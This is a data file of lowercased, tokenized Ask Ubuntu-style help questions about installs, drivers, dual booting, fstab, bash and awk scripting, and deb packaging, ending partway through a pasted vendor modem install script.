439673	ca n't launch jd-gui on ubuntu 12.10 64bits	when i try to open jd-gui via the terminal it gives me the following error error while loading shared libraries : libgtk-x11-2.0.so.0 : can not open shared object file : no such file or directory . so i tried to install the library using the following commands : sudo apt-get install libgtk2.0-0 : i386 sudo apt-get install libcanberra-gtk-module : i386 sudo apt-get install gtk2-engines-murrine : i386 and the output is the following : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libcanberra-gtk-module so i went out to download the [ file ] https : //packages.debian.org/wheezy/libgtk2.0-0-dbg that seems to have a .deb installer of the library and when i click to install it the ubuntu software center opens and it displays the following error : dependency is not satisfiable : libgtk2.0-0 ( =2.24.10-2 ) . note : after trying all of this i did a apt-get upgrade and a apt-get update and tried it all over again but it still did n't work . i 've been trying this for hours , i already googled but i found no solution .
439674	ca n't login after installing libimobiledevice	i am using ubuntu 13.10 and just installed libimobiledevice from software centre . i rebooted after the install and now i am unable to log in . i get to the login in screen , enter my password for my user name and get stuck at that point . it will not go any further . my problem seems very similar to this thread as they also installed libimobiledevice . unable to type in password at login screen after restart ? i would have chimed in on that post but i am new user and not allowed to comment . please help !
439675	xubuntu 13.10 ( kernel 3.11.0-18-generic ) no hdmi sound	i am a complete noob to xubuntu . i have been trying all day to get hdmi audio to work , i have a radeon hd 6800 using a hdmi to tv and i can not do it at all . it shows up in pulseaudio volume control as `` barts hdmi audio [ radeon hd 6800 series ] digital stereo ( hdmi ) '' port = hdmi / displayport it also shows up when sound is played on that screen ( levels ) but no audio is coming out . i have tried nearly all suggested fixes . its probably really simple to someone who knows but i have tried everything i can to get it to work . alsa shows up as 00 - unmuted , but it also says spdif - could this be the issue ? any help appreciated . if you want me to post any system info up , i would appreciate it if you could tell me what command to put in first . - complete noob : d
439676	does n't my bios support booting from usb ?	seeing that my ubuntu 12.04 install is quite messed up ( refuses to update and random crashes ) , i want to install the latest and greatest ubuntu 14.04 on it . although my machine is still more than fast and large enough for my needs ( quad core , 6gb ram and 2tb hard drive ) it is also already about 6 years old . i wanted to burn 14.04 on a cd , but my cd drive seems to refuse service ( both reading and writing ) . i then thought of installing it using a usb stick , but in my bios i see no mention of a usb drive ( see image below ) . does this mean that i can not boot from usb ? so does this mean i have no choice but buying a new cd drive just to install ubuntu on it ? all tips are welcome !
439678	ubuntu 12.04 installation hangs on windows 8 lenovo	i am trying to install ubuntu 12.04 on a new lenovo g505 with windows 8 . i am admittedly not much of a computer person , and have not been able to get ubuntu to fully install . so far , i have : partitioned the hard drive created a bootable usb disabled fast boot disabled secure boot enabled legacy mode when i boot from the usb i get the option to try or install ubuntu . no matter what i pick , i then see the opening purple ubuntu screen for about 15 seconds , then a really fast script , and then the screen goes black and the installation hangs up . i have to restart the computer to try again . what am i doing wrong , and how do i get rid of this horrible windows 8 ? ! thanks so much for the help !
439679	why does default incoming deny not stop firefox from working ?	if ufw is actually not an application layer firewall but a `` interface to iptables '' , how can it be if i have by default incoming deny and outgoing allow setting that any internet application is working ? especially deluge and transmission the torrent clients are working . why ? i mean firefox does receive traffic on port 80 for example ( incoming ! ) . to me that would prove that actually the ufw is not working at all ?
439680	how to enable bluetooth on ubuntu 12.04	after installing ubuntu 12.04 i do n't see bluetooth icon . and when try to enable bluetooth from bluetooth manager , have a message `` no bluetooth adapters foun '' and ca n't enable any thing .
439683	disabling acrobat reader 's automatic updates	having installed adobe acrobat reader ( acroread ) from the canonical partner repository on a client computer ( ubuntu 12.04 ) , i was asked if i could turn off the automatic updates . so , does acrobat reader update itself or are the updates handled by the package managers like for all the other programs ? and how to disable automatic updates for acrobat reader ?
439689	getting keyboard messages	i want to get espeak pronounce the name of any key of the keyboard when they are pressed . i think i need somehow hook the keyboard so that a command can be run when a key is pressed . how can i do that ?
439691	how to disable wmm on network adapter ?	i am using a lenovo ideapad s415 touch . basically , in order to get the wifi working with it on my college campus using my windows partition , i have to go into advanced device settings for my network adapter and disable wmm . this completely fixes my problem ... except only in windows . so what i 'm asking is , how would i do this same thing in ubuntu ? here 's my hardware info : 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 08 ) 02:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) wl 4207846 0 lib80211 14381 2 wl , lib80211_crypt_tkip cfg80211 490477 1 wl
439695	no os detected after ubuntu install	new to linux and trying to set up everything . so i had win 7 before , i made a partition for win , it created smaller one for its data , around 100 mb . and a partition for linux that i will use later . so managed after a long trouble with booting from usb install linux , and now i do n't have any os , so writing this from linux that i booted from usb . what now , what info can i provide to help you help me . i have asrock p67 axtreme3 , i5 , 660 , its uefi , i read that its important.. help me to dual boot please luj0 @ luj0-desktop : ~ $ sudo update grub [ sudo ] password for luj0 : sudo : update : command not found luj0 @ luj0-desktop : ~ $ sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002dcc9 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 1748723710 1953523711 102400001 5 extended /dev/sda3 307202048 1748721663 720759808 7 hpfs/ntfs/exfat /dev/sda4 206848 307202047 153497600 82 linux swap / solaris /dev/sda5 1748723712 1953523711 102400000 83 linux partition table entries are not in disk order disk /dev/sdb : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8fe48fe4 device boot start end blocks id system /dev/sdb1 2048 241414523 120706238 7 hpfs/ntfs/exfat /dev/sdb2 241416190 488396799 123490305 5 extended /dev/sdb5 241416192 471861247 115222528 83 linux /dev/sdb6 471863296 488396799 8266752 82 linux swap / solaris disk /dev/sdc : 16.1 gb , 16106127360 bytes 255 heads , 63 sectors/track , 1958 cylinders , total 31457280 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 * 2048 31457279 15727616 7 hpfs/ntfs/exfat so this was my win 7 partition before /dev/sda3 , i recognize it by amount of gb . curently have 1 tb with 2 os installed , and one empty 250 gb drive for data only.. no os . oh yeah and a usb containing windows is in , tried to repair startup but no go upd : i managed to boot onto ubuntu , but here is the second problem i am facing : i do n't see option to boot into win 7 . i did a boot repair as suggested on another response . so what can i do to have dual boot , or to find windows ? do note that i do n't have cd drive so ca n't use recovery cd , and i do n't have one ; )
439696	vostro 1500 wifi not working	i 'm a total noob to linux so can somebody help me figure out how to get my built in wifi card on my dell vostro 1500 running ubuntu 13.10 . when i was installing it from my usb drive it showed in `` additional drivers '' and promptly disappeared when i did the full install . any help would be appreciated . 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 )
439700	ubuntu not suspending properly	i have an x86 desktop running ubuntu 12.04 lts . i did some things ( do not remember ) to the brightness and lock system settings and then put them back to the default . now when i try to suspend the machine turns off but when i turn the machine back on the bongos eventually sound and i get a logon screen that looks like it should be the first screen shown on a cold start . when i enter the logon information the screen goes blank and then comes up with the primary screen with the icons on the left and none of the programs running when i suspended . what is going on ?
439703	vim syntax highlighting question	i have a doubt about vim , i installed the editor on my ubuntu 13.10 and everything is ok. but when i create a file `` .txt , or .conf '' the highlighting is n't enabled , i put `` # '' and `` but not change color in the file but when i open a file `` .conf '' the highlighting is enabled . the syntax is on someone can help me ?
439710	what partitions are being used by ubuntu and windows 8 ?	i have 8 partitions on my computer . 2 of them are being used by windows and one is being used by ubuntu . i may soon remove ubuntu , however i have no idea what the swap partition is for ubuntu . i just would like to know what partitions are being used by windows and which ones are being used by ubuntu . one is os ( c : ) and that is the one with windows 8 . i then have data ( d : ) which is what i use as a secondary drive for windows . both are ntfs . there is also just ( f : ) which i believe is my ubuntu partition using a raw file system . there are now 5 unnamed partitions with no file system that are labeled 300 mb efi system partition , 600 mb recovery partition , 7.45 gb primary partition , 350 mb recovery partition , and a 20.01 gb recovery partition .
439711	how to install ubuntu alongside windows 8.1 ?	i want to install ubuntu alongside windows 8.1 , but i ca n't do the partitioning because ubuntu does not recognize windows 8.1 . everything was ok in ubuntu , but when i shut down ubuntu and booted to windows , it looked like i had changed to `` zoom '' because everything on the screen looked too big . i checked the appearance of the screen , and it was set at the default . what can i do to fix this ?
439712	is there a way to display virtual workspaces in xfwm ?	is there an alternative to unity/compiz/kde 's ability to display virtual workspaces in a grid on xfwm ? if not , what would one need to do to attempt to build one ?
439715	is it possible for me to install sims 3 using ubuntu 13.04	i would like to install all my sims 3 again on my pc im new to ubuntu and i have tried playonlinux and wine they do n't work i can download it but i cant play on it , it says there has been an error and the system you are using has crashed if your system is running then ignore this message playonlinux says that every time i have tried to play it ... ive tried configuring wine and debugging it on playonlinux but im not having any success . is there any other playonlinux/wine alternatives ? im open to hearing any solution , thanks ! : )
439719	prevent mounting a partition in fstab	so i feel really bad for asking this question because it looks like it has been asked a million times on the internet . i am even finding a very consistent answer , and i am not getting any errors when i try the solution i found , but it is still not working . here is the issue . i have an ntfs partition on an external hard drive that i do not want to mount on startup ( sound like a freaking common problem or what ? ) . i have found this question asked all over the internet , and the single answer that comes back pretty much unanimously is i should be using the `` noauto '' option in fstab for the device . even the man pages for fstab states : '' noauto do not mount when `` mount -a '' is given ( e.g. , at boot time ) '' sounds like that is what i want right ? ! well i am using that option and the drive is still mounted by the time i log into my account . here are my fstab entries for the 2 partitions that are on the same external drive : # external 2tb drive uuid=8598c4fc-171a-4324-a4d3-06145d12ceba /media/storage ext4 errors=remount-ro 0 2 # windows compatability partition on external drive does not need to be mounted . uuid=751e843a54b3d902 /media/windows\040compatability ntfs noauto 0 0 i am at a total loss for why the noauto option is not working like i expect it to , but when i start up my pc the drive is available and mounted at the location specified ( /media/windows compatability ) . i tried changing the options ( like user/nouser ) and those behaved as expected . just the noauto is completely baffling me . thanks for any help . b. ps : if you are curious about the use case , there is a 2tb ext4 partition on the drive , and then a small ntfs partition on it . the point of the ntfs is to carry some windows tools for reading ext4 when i have to use my drive on a strange machine .
439722	can i run ubuntu installed on a usb flashdrive from the flashdrive to safely use the internet on an nt desktop	i have an nt desktop i want to continue to use but do not want to be exposed to security issues after april 8 . i 've read i can boot the computer from a flashdrive with a linux based os installed on it and use the internet off the flashdrive while keeping the desktop safe . will ubuntu work for this ? if so how big of a flashdrive will i need ? thanks . in response to danatela , yes i want to place a persistence file onto that usb .
439724	installing android studio in ubuntu 12.04	i am trying to install android studio in ubuntu 12.04 following the directions from here : http : //developer.android.com/sdk/installing/studio.html # updating . when i run studio.sh from android-studio/bin/ i get the following error-message : '' openjdk 6 is not supported . please use oracle java or newer openjdk . '' then i tried to update or install the openjdk using : `` sudo apt-get install openjdk-6-jdk '' and `` sudo apt-get install openjdk-6-jre '' , but nothing works . any help you could provide i would really appreciate it . thanks in advance .
439725	toshiba c-55t touch screen went black screen after installing 12.04. please advise	fresh install of 12.04 on a toshiba c55t touch screen over win 8.1 screen went black . using another monitor now , but miss my touch screen . toshiba only has drivers for windows . please help . ok so its a toshiba satellite c55t s/n zd245632q windows8.1 toshiba satellite c55t-a5123 touchscreen diagonal hd trubrite intel celeron cpu n2820 dual-core 2.13ghz 4gb 500gb dvdâąrw 15.6 '' h/w hd/webcam stuck on gnubash message shows drm : fill_in_dev failed it acts as if it 's waiting for a command.. did a nomodeset no quiet no splash in gnu bash then after loading stops i gge it just blinks . error message in loading then the drm stuck on log in when i tried to reboot it said no root .
439727	problems with the network	i have an acer c720 chromebook that i just put ubuntu precise , xfce4 on . it tells me that `` networking is disabled '' on the icon , when i click the icon it tells me `` networkmanager is not running '' . the odd thing is i can still get on wifi and connect to the internet , but everything in ubuntu says that i ca n't . i have to keep switching over to the chrome os to look for my wifi hotspots . i have tried some of the other pages , but nothing is working so far . i 'm a novice at ubuntu , and this is my first time using this os . any help would be great .
439728	problems with startup	i 'm new to ubuntu and i have been having a problem . i installed ubuntu 13.10 via flash drive and whenever i try to start up my computer it gives me the error `` /dev/disk/by-uuid/xxxxx-xxxxx-xxxx-xxxx-xxxxxxxx does not exist , dropping to shell . then if i type `` exit '' in the shell it will go to the ubuntu loading screen and start up just fine . any idea what is causing this problem ?
439729	how can i install the proprietary drivers for a radeon 3000 card ?	i want to install the proprietary drivers for drivers my ati radeon 3000 graphics card on ubuntu 12.04 lts 32-bit . but when installing any version of catalyst ( 13.1 , 12.6 , 12.4 ) i have had problems in the last 2 versions provided by amd . i get a message telling me that some required components ( without specifying which components , and i can not find them anywhere ) are missing . while i managed to install the previous one ( 12.04 ) , after rebooting the pc does not boot , and the screen just turns on and then off again , without showing the bios post messages . i downloaded the drivers from the amd support site , made them executable and subsequently ran sudo ./amd-driver-installer-12-4-x86.x86_64.run . the installation wizard window was indeed shown and things seemed to go ok , but after reboot i get the symptoms described above . what can i do ?
439732	how can i process multi-line records with awk in a bash script ?	example.txt is below restaurant : mcdonalds city : miami state : florida address : 123 biscayne blvd phone : 911 restaurant : 5 guys city : atlanta state : georgia address : 123 peachtree rd phone : 911 restaurant : kfc city : nyc state : ny address : 123 madison square phone : 911 im using bash script and lets say i want to search for a restaurant by its name from the file above . ask the user input for the restaurant name and it should print the information regarding that restaurant ( 5 lines ) . awk '/mcdonalds/ > /kfc/ ' example.txt i know that line of code above will print the whole line that matches the pattern `` mcdonalds '' and `` kfc '' but that will just print the 1st line from the text file but not the rest of the information about that restaurant . how can i tell it to print all of the information ( 5lines ) from just the user input of the restaurant name ?
439734	automatic shut down and reboot at specific time	i have an assignment that requires me to write a script that shuts down a server at 11pm and reboots it at 6am daily . so far , i have only written a command to shut it down but i do not know how to reboot the system at the specified time . any help would be appreciated . thank you ! # ! /bin/bash # shutdown -r now
439741	ubuntu 14.04 biblatex	maybe i just did not get any information while searching through google pages but i really tried to find some about biblatex . i tried aptitude search biblatex but nothing appeared . why is n't biblatex in the universe anymore ? is there some other/newer software to replace biblatex in 14.04 ? thanks for every answer : ) ascenator
439745	opening ubuntu error	i just downloaded ubuntu using wubi.exe on windows 7 . whenever i start up my computer , i see the windows boot manager with two options - windows or ubuntu . i try opening ubuntu , which leads me to the ubuntu purple and white loading screen , but after about a minute , i return back to the windows boot manager . i can keep trying to open ubuntu , and i get stuck in an infinite loop . is there something wrong with my computer or did i do installation wrong ?
439750	creating nested menus in bash	i want to create more menus under option `` a '' when selected . if the user entered option `` a '' i want it to have a couple menus for you to select and for one of the options is to return to the `` main menu '' . this is the 2 problems i 'm having trouble with . i tried doing this same format i have below for the menu here and put it under `` a '' block of code but that did n't work . # ! /bin/bash ok=0 ; while ( ( ok==0 ) ) do echo `` main menu : '' echo -e `` \t ( a ) more menu options `` echo -e `` \t ( b ) exit '' echo -n `` please enter your choice : '' read choice case $ choice in `` a '' | '' a '' ) ok=1 ; ; `` b '' | '' b '' ) exit ; ; * ) echo `` invalid answer , please try again '' ; ; esac done
439756	removing a partition	a customer recently gave me their old computer with windows xp on it . they said the motherboard was dead so they just gave it to me . they also said that it was a 40gb hard drive but after taking it apart , i found it was a 120gb hard drive and the motherboard battery needed to be replaced . when i got it running i found that there was an 80gb partition which was almost empty except for a few documents . when i tried to update it to windows 7 there was not enough room on the hard drive as the operating system was using the smaller partition and all programs were on that partition . how can i remove the partition and restore the 120gb hard drive ? i had a terrible time getting ubuntu installed as the bios would only show to boot from a network or the system files . is there a way to remove this partition using ubuntu ?
439758	publish a package on ubuntu software center ?	recent , i uploaded a package on myapps . after uploading finished , i received a notice : thank you for submitting a gratis free software application through myapps . at this time we are unable to process this request , as we are working on the implementation of a new app upload process . to get your software out to millions of ubuntu users in the meantime , you can either use a personal package archive to distribute your app for free , or you can define a price to charge for your app . can new app upload process finish ? and my request will be process ? how can i use ppa to upload my package . my package is a .deb package . thank you !
439763	head is now at 9e52a21	i am trying to run a kernel module on a nexus 7 emulator on ubuntu . i ran this command in the terminal : git clone https : //android.googlesource.com/kernel/msm.git then i want to checkout this : git checkout remotes/origin/android-msm-flo-3.4-jb-mr2 once i entered that line above i got this error : head is now at 9e52a21 ... qseecom : fix issue with incomplete command exiting prematurely i tried it with sudo , i tried adding things like -p , -3 at the end of the command , but nothing works . how do i fix this ?
439766	how to play online games on ubuntu ?	i am a fan of 8 ball pool on miniclip . also i have dual boot oss , so i play on windows , but whenever i open it in ubuntu in chromium browser , i always get a white screen like this : i even tried playing it on facebook , but it is still like that . i have installed flash player or plugin , . but i 'm not sure it got installed or whatever . can someone please tell me any way to fix it ?
439771	switch from windows 7 to ubuntu	my current pc is running on intel core 2 duo processor 2.80ghz with 2gb ram . i run windows 7 32-bit on this configuration , but the pc shuts down sometimes due to over heating . also , the cpu is always running on more than 50 % capacity . will switching to ubuntu address these problems ? can i get a faster os with ubuntu ?
439772	download ubuntu as zip ? iso download blocked	i sit behind the most poorly set up network ever . however , it blocks certain file extensions like .iso , .exe or .msi ( thankfully i do n't need the last 2 mentioned ones ) . my problem is , that the ubuntu downloads are no longer .zip and that prevents me from upgrading to 13.10 . i do n't trust any others pages so i think it might be a good idea to offer both , .iso and .zip for all versions on ubuntu.com , or is it already ? thanks for listening .
439777	installing google drive on ubuntu 12.04	i was searching for google drive and its installation instructions in ubuntu 12.04 , i tried sudo apt -get install , but did n't find google drive application on ubuntu repo . is there any alternative or hack to install google drive on ubuntu 12.04
439779	how can i alphabetize a multi line record from a text file ?	hi i 'm working with bash script and i have example.txt below . how can i alphabetize the following 4 information about restaurants by the restaurant name and print it out ? note that the format when printed alphabetically that it should remain the same as below including city , state , address , phone . restaurant : mcdonalds city : miami state : florida address : 123 biscayne blvd phone : 91341 restaurant : five guys city : atlanta state : georgia address : 123 peachtree rd phone : 9234211 restaurant : kfc city : nyc state : ny address : 123 madison square phone : 95311 restaurant : taco bell city : la state : ca address : 123 rodeo drive phone : 911
439780	how to create directory and change it 's owner with the deb package	i need to create deb package that will create directory for logs . i want to create directory /var/logs/my_package and to change it 's owner to my_user . in the docs there is information that i can create file debian/dir . but there is info that this is not the best way to do it . and there is no info how one should change there directory owner ( i 'm thinking about placing command chown my_user.my_user /var/logs/my_packageit in debian/postinst file ) . what is the recommended way to create directory with the deb package ?
439782	encrypted lock screens ?	i really like the disk encryption to secure my funds , but my problem is i practically never have my computer off . i live a very busy life and shutting it down totally every night is entirely impractical , so at most i typically suspend/lock it . i have my suspicions that this lock screen does very little against an attacker that might have the computer in their hands . am i right ? is having disk encryption pointless if i never turn off my computer ? is there any software that can enable lock-screen encryption ?
439783	updating ubuntu 13.10 problem on dell e6410	when ever i try to update , i get this message : w : failed to fetch cdrom : //ubuntu-gnome 13.10 _saucy salamander_ - release amd64 ( 20131017 ) /dists/saucy/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-gnome 13.10 _saucy salamander_ - release amd64 ( 20131017 ) /dists/saucy/multiverse/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-gnome 13.10 _saucy salamander_ - release amd64 ( 20131017 ) /dists/saucy/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-gnome 13.10 _saucy salamander_ - release amd64 ( 20131017 ) /dists/saucy/universe/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-gnome 13.10 _saucy salamander_ - release amd64 ( 20131017 ) /dists/saucy/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-gnome 13.10 _saucy salamander_ - release amd64 ( 20131017 ) /dists/saucy/multiverse/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-gnome 13.10 _saucy salamander_ - release amd64 ( 20131017 ) /dists/saucy/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu-gnome 13.10 _saucy salamander_ - release amd64 ( 20131017 ) /dists/saucy/universe/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . though i have internet connection . what would be the problem ?
439785	how to clear history from a script ?	i am writing an script to dump my history log into another file `` myhistory.log '' , and then clear that history . i have written the following set of commands : date > > myhistory.log history > > myhistory.log history -c everything goes well except that the previous history is not cleared . i have tried the following variations : \history -c and clrh= '' history -c '' exec $ clrh what i am missing probably ? ?
439786	root has taken rights	i installed root user of ubunutu and it is working properly . but the only problem is when i come back to my main account , it says that i can not unmount or mount any drive as it 's in root 's ownership . i tried going into root and changing owner from there but when i change back it reverts quickly . please help as i 've to go to root everytime when i want to mount or unmount something thank you edit : /etc/fstab requested by danatela did n't know how to put them in code format . so pasted them in pastebin here 's the link fstab file
439789	install 64-bit ( trusty ) on 32-bit ( saucy )	on an ubuntu 32-bit system ( saucy ) , i 'm trying to install the 64-bit version of trusty . for this i 've created a new partition and ( temp . ) mounted on /mnt . after installation of ( all ? ) needed packages ... unix > apt-get install binfmt-support qemu qemu-user-static debootstrap multistrap schroot ... i 'm running debootstrap : unix > debootstrap -- arch amd64 -- foreign trusty /mnt/ http : //my.archive.ubuntu.com/ubuntu question : how do i run the 2nd stage using qemu ? or : how can i install a 64-bit kernel ?
439796	how can i install gnome 3.10 in ubuntu 12.04 ?	i do n't think i am a complete n00b when it comes to ubuntu , but i can not figure this out for the life of me . i removed unity from my computer , i added the gnome shell and core , and a few other things , but i can not get gnome 3.10 on my ubuntu 12.04 . i just had ubuntu 13.10 installed and went with a fresh install of 12.04 instead because i could n't get it to work on 13.10 either . am i nuts or is it just not possible to have gnome 3.10 on ubuntu 12.04 ? also , i have gdm installed . but when i login , it does n't look how i want it to . i am trying to get it to look like this and have all the same features everything i am seeing is telling me how to install it for 13.10 , and i thought it would be the same , but i guess i am completely wrong . any help would be greatly appreciated .
439798	why can i connect to a windows homeshare when i have my vpn turned on but not when i have it turned off ?	i 'm new to ubuntu and i was n't really having any major problems until i took my computer to work . i was n't able to connect to the local network where all the shared files were kept even though i was able to connect to the internet and even to the network printers . if i tried to connect to the network it would just give a connection time out error . then , just by chance , i had my vpn turned on and tried to connect and it magically connected . since then i 've tested this to make sure that was actually what was allowing me to connect to the local network , and it definitely is . why is this the case ? and is there any way to make it connect reliably without the vpn turned on ? right now i 'm fine just keeping my vpn turned on but i was just curious . thanks
439801	man command does not work with yelp	when i was introduced with ubuntu 8.04 , the yelp ( ubuntu documentation ) was aware of man command : simply type man : < manpage > into the search string showed the desired man page in html look and feel . however , since release 13.04 this feature looks like has been removed . here is the screenshot of yelp from 10.04 : does anyone know how to turn it back ?
439803	uninstalling app/program/service installed through *.sh script	i have installed a program using install.sh from command line , but it is not responding hence need to remove it . how to remove such program ? thanks a lot in advance . here is the shell script . # ! /bin/bash file_name=photon_3g new_file_path_tata=photon_3g/zte/mf190 exe_file=photon_3g display_name= '' photon 3g '' sys_path=/opt install_path= $ sys_path/ $ new_file_path_tata language=english # driver_name=linuxdriveronda1.0.1 qm_name=ondatim_lan.qm help=help # help=help.html cancel by chenying 2009-2-13 # helpfiles=index_files run_evince= $ sys_path/ $ new_file_path_tata/data/launchfirefox.sh update_file=update aplay= $ sys_path/ $ new_file_path_tata/data/aplay.sh # added by chenying 2009-11-26 # ******************************************************** # define variable-two-frase-production-by-yh-20090822 -- -begin -- -- -- -- - two_on=true # true or false path_name=`dirname $ 0` tmp_dir_name=/tmp two_frase_temp_dir= $ tmp_dir_name/two_phase_temp two_frase_config_file_modem=/pccfg/description.xml des_dir= $ install_path zip_file_name= $ two_frase_temp_dir/lu.zip temp_dir= $ two_frase_temp_dir/temp last_run= $ install_path/last_run.sh choose_language_run= $ temp_dir/choose_language.sh # define variable-two-frase-production-by-yh-20090822 -- -end -- -- -- -- -- -- # ******************************************************** if [ -f $ install_path/ $ exe_file ] ; then echo `` ****** fail to install ! ! ! `` echo the `` $ exe_file '' has been installed . read -p `` press any key to exit ... . `` -n 1 exit -1 fi echo `` ... ... ... ... ... ... start install ... ... ... ... ... .. '' echo -n `` *** check for root ... '' if [ $ euid -ne 0 ] ; then echo -e `` \b\b\b - failed '' echo `` *** please retry as root user . '' read -p `` press any key to exit ... . `` -n 1 exit -1 fi echo `` ok ... '' # select the language for the installation form the choices below . # ( 1 ) english # ( 2 ) italian # ( 3 ) spanish # ( 4 ) simplified chinese # ( 5 ) traditional chinese `` # echo `` please input number ( 1,2,3,4 or 5 ) : '' # read s_number # # if [ $ s_number == `` 1 '' ] ; then # language=english # elif [ $ s_number == `` 2 '' ] ; then # language=italian # elif [ $ s_number == `` 3 '' ] ; then # language=spanish # elif [ $ s_number == `` 4 '' ] ; then # language=simplified_chinese # elif [ $ s_number == `` 5 '' ] ; then # language=traditional_chinese # else # language=english # fi # ******************************************************** # download files-two-frase-production-by-yh-20090822 -- -begin -- -- -- -- - rettfp=3 if [ $ two_on == 'true ' ] ; then if [ -d $ two_frase_temp_dir ] ; then rm -rf $ two_frase_temp_dir fi mkdir -p $ two_frase_temp_dir if [ -f $ path_name/zr ] ; then chmod +x $ path_name/zr $ path_name/zr $ two_frase_config_file_modem $ two_frase_temp_dir rettfp= $ ? fi if [ $ rettfp == '5 ' -o $ rettfp == '6 ' -o $ rettfp == '7 ' ] ; then echo -e `` stage 5 '' # echo -e `` can not complete the installation . installation will abort . '' # echo -e `` please try to install again . '' # read temp_1 # exit -1 elif [ $ rettfp == '3 ' -o $ rettfp == '4 ' ] ; then echo -e `` stage 3 '' else echo -e `` get resouse file successfully . '' fi fi # download files-two-frase-production-by-yh -- 20090822 -- end -- -- -- -- -- # gaoxiang added 2009.4.16 for change networkmanager.conf # # # # # conf_file= '' /etc/dbus-1/system.d/networkmanager.conf '' # if [ -f $ conf_file ] ; then # echo ... ... ... ... .modify networkmanager.conf ... ... ... ... ... # sed '/send_interface=\ '' org\.freedesktop\.networkmanager\ '' /s/allow/deny/g ' $ conf_file > networkmanager.conf.temp # mv -f networkmanager.conf.temp $ conf_file # /etc/init.d/networkmanager restart # fi # end of gaoxiang # delete first if [ -f $ install_path/ $ file_name ] ; then rm -rf $ install_path rm -f /bin/ $ file_name fi if [ -f $ install_path/ $ exe_file ] ; then rm -rf $ install_path rm -f /bin/ $ exe_file fi tmp_file=/etc/defaultwvdial.conf if [ -f $ tmp_file ] ; then rm -f $ tmp_file echo ... ... ... .delete $ tmp_file ok ... ... ... .. fi tmp_file=/etc/ppp/defaultoptions if [ -f $ tmp_file ] ; then rm -f $ tmp_file echo ... ... ... .delete $ tmp_file ok ... ... ... .. fi tmp_file=/etc/ppp/defaultresolv.conf if [ -f $ tmp_file ] ; then rm -f $ tmp_file echo ... ... ... .delete $ tmp_file ok ... ... ... .. fi tmp_file=/etc/defaultresolv.conf if [ -f $ tmp_file ] ; then rm -f $ tmp_file echo ... ... ... .delete $ tmp_file ok ... ... ... .. fi tmp_file=/usr/share/applications/ $ file_name*.desktop if [ -f $ tmp_file ] ; then rm -f $ tmp_file echo ... ... ... .delete $ tmp_file ok ... ... ... .. fi tmp_file=/usr/share/pixmaps/ $ file_name*.png if [ -f $ tmp_file ] ; then rm -f $ tmp_file echo ... ... ... .delete $ tmp_file ok ... ... ... .. fi # delete autorun files tmp_file=/sbin/join-air-launch.sh if [ -f $ tmp_file ] ; then rm -f $ tmp_file echo ... ... ... .delete $ tmp_file ok ... ... ... .. fi tmp_file=/etc/udev/rules.d/998-join-air.rules if [ -f $ tmp_file ] ; then rm -f $ tmp_file echo ... ... ... .delete $ tmp_file ok ... ... ... .. fi tmp_file=/etc/udev/rules.d/9-cdrom.rules if [ -f $ tmp_file ] ; then rm -f $ tmp_file echo ... ... ... .delete $ tmp_file ok ... ... ... .. fi cp -f $ file_name.tar.gz $ sys_path/ $ file_name.tar.gz cd $ sys_path tar -zxvf $ file_name.tar.gz # ******************************************************** # replace files-two-frase-production-by-yh -- 20090822 -- begin -- -- -- -- - if [ $ two_on == 'true ' -a $ rettfp == '0 ' ] ; then # unzip files unzip > /dev/null ret= $ ? if [ $ ret ! = '0 ' ] ; then echo -e `` can not find unzip . '' echo -e `` installation will abort . '' exit -1 fi unzip -o $ zip_file_name -d $ temp_dir retunz= $ ? if [ $ retunz ! = '0 ' ] ; then echo -e `` unzip $ zip_file_name failed . '' echo -e `` installation will abort . '' exit -1 else echo -e `` unzip $ zip_file_name successfully . '' fi return_choose_lang=1 if [ $ rettfp == '0 ' -a -f $ choose_language_run ] ; then chmod +x $ choose_language_run $ choose_language_run return_choose_lang= $ ? fi # change permission # chmod 0755 -r $ temp_dir # chmod u+s -r $ temp_dir # backup destination directory backup_des_dir= $ two_frase_temp_dir/backup_for_desdir if [ -d $ backup_des_dir ] ; then rm -rf $ backup_des_dir fi mkdir -p $ backup_des_dir cp -rf $ des_dir/* $ backup_des_dir/ # start to replace cp -rf $ 